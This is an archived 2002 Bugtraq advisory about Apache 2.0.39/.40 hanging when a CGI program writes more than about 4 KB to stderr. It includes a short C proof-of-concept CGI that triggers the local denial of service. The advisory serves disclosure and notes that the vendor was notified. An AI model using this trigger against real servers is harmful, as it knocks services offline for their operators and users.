Apache 2.0.(39|40) DOS (PHP!)

From: shaddup@hush.com
Date: 09/23/02 

Date: Mon, 23 Sep 2002 12:33:04 -0700
To: bugtraq@securityfocus.com
From: shaddup@hush.com

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- -=~=-_-=~=-_-=~=-
I put PHP in the title so I know this message will reach the "sekur1ty c0mmun1ty", that *knows* that PHP is bad, because it's easy to write insecure applications, unlike C.
- -=~=-_-=~=-_-=~=-
Problem:
 o Apache 2.0 (.39 and .40 tested) on Linuxx0r (and possibly other OS's)
 will hang on a write to stderr that is larger than the default buffer
 size (4k on Linux)
Impact:
 o Local users can cause apache's httpd process to hang
 o Possible new DoS to look for in web apps that write
 user input to stderr!
Tested on:
 o Linux (RedHat)
 o FreeBSD (did not show a problem, but not well tested)
Notification:
 o The Apache Projekt was contacted July 9th, 2002
   (http://nagoya.apache.org/bugzilla/show_bug.cgi?id=10515)

- -=~=-_-=~=-_-=~=-
Sample Code
- -=~=-_-=~=-_-=~=-
// Credit to: K.C. Wong
#include <stdio.h>
#include <time.h>
#include <unistd.h>
#include <fcntl.h>

#define SIZE 4075

void out_err()
{
        char buffer[SIZE];
        int i = 0;

        for (i = 0; i < SIZE - 1; ++i)
                buffer[i] = 'a' + (char )(i % 26);

        buffer[SIZE - 1] = '\0';

//
fcntl(2, F_SETFL, fcntl(2, F_GETFL) | O_NONBLOCK);

        fprintf(stderr, "short test\n");
        fflush(stderr);

        fprintf(stderr, "test error=%s\n", buffer);
        fflush(stderr);
} // out_err()

int main(int argc, char ** argv)
{
        fprintf(stdout, "Context-Type: text/html\r\n");
        fprintf(stdout, "\r\n\r\n");
        out_err();
        fprintf(stdout, "<HTML>\n");
        fprintf(stdout, "<body>\n");
        fprintf(stdout, "<h1>hello world</h1>\n");
        fprintf(stdout, "</body>\n");
        fprintf(stdout, "</HTML>\n");
        fflush(stdout);
        exit(0);
} // main()

-----BEGIN PGP SIGNATURE-----
Version: Hush 2.1
Note: This signature can be verified at https://www.hushtools.com

wlgEARECABgFAj2Pa0MRHHNoYWRkdXBAaHVzaC5jb20ACgkQ8iAl114OGrxaHwCgsmGs
262aOmBHEUw01ktoAADRIz0AoJOdidtdbVswjjp0sqn1uHW+EQCT
=8PKT
-----END PGP SIGNATURE-----

Get your free encrypted email at https://www.hushmail.com

Relevant Pages

  • [Full-Disclosure] Re: Apache 2.0.(39|40) DOS (PHP!)
    ... > will hang on a write to stderr that is larger than the default buffer ... > size (4k on Linux) ... > o Local users can cause apache's httpd process to hang ...
    (Full-Disclosure)
  • Re: Best development platform? Mac, Windows or Linux?
    ... Cygwin provides some of these ... Mac or Linux is the way to go. ... Development platform I prefer Eclipse (PHP environment) which is cross- ...
    (comp.lang.php)
  • PHP is the VB of Linux
    ... Linux and JSP. ... I plan to stay on Linux now. ... I started working with PHP and MySQL because I felt it had ... So, newbies, if you are looking for the "VB" in Linux, look no further ...
    (comp.lang.php)
  • Re: Is there MS Access Equivalent for Linux
    ... The usual way to do this on a Linux end-user system is to run MySQL or ... PostGreSQL, run the Apache Web server ... Here is a download of some example PHP pages from my site: ... MySQL accepts plain-text database tables, so updating the recipe database is ...
    (comp.os.linux.misc)
  • Re: Hosting per il mio sito...
    ... Se il PHP lo devi usare da solo od accostare ad un db mySQL allora ... prendi Linux, costa anche meno. ... ma www.aleax.it e` su Aruba da sempre (attualmente su Linux) ...
    (it.comp.macintosh)